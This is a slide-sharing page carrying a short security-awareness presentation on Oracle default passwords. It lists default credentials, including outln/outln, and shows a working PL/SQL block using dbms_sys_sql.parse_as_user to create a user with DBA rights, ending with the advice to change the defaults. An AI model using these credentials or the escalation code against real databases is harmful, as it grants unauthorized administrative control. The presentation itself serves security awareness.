1 / 9

Remember to change the OUTLN password

Remember to change the OUTLN password. Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch. Default passwords. sys/change_on_install system/manager outln/outln. Log on as OUTLN. SQL> show user USER is "OUTLN" SQL> select * from all_users where username = 'HACKY';

teness
Download Presentation

Remember to change the OUTLN password

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

  2. Default passwords • sys/change_on_install • system/manager • outln/outln

  3. Log on as OUTLN SQL> show user USER is "OUTLN" SQL> select * from all_users where username = 'HACKY'; no rows selected

  4. SQL> select * FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION ALTER SESSION UNLIMITED TABLESPACE CREATE TABLE CREATE CLUSTER CREATE SYNONYM CREATE VIEW CREATE SEQUENCE CREATE DATABASE LINK CREATE PROCEDURE EXECUTE ANY PROCEDURE CREATE TRIGGER CREATE TYPE CREATE OPERATOR CREATE INDEXTYPE 15 rows selected. OUTLN has lots of privileges

  5. So create a user with DBA privilege DECLARE mycur INTEGER; BEGIN mycur := sys.dbms_sys_sql.open_cursor; sys.dbms_sys_sql.parse_as_user(mycur, 'create user hacky identified by macho',dbms_sql.native, 0); sys.dbms_sys_sql.parse_as_user(mycur, 'grant dba to hacky',dbms_sql.native,0); sys.dbms_sys_sql.close_cursor(mycur); END; / PL/SQL procedure successfully completed.

  6. So I did create the user, but I don’t have the privileges myself SQL> DROP USER HACKY; DROP USER HACKY * ERROR at line 1: ORA-01031: insufficient privileges

  7. The keys to the kingdom • I have created a new user with DBA privilege • I have executed code as the DBA • I could do anything! • Worried?

  8. The Moral of this story is… • Change all the default passwords • Including OUTLN/OUTLN

  9. Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

More Related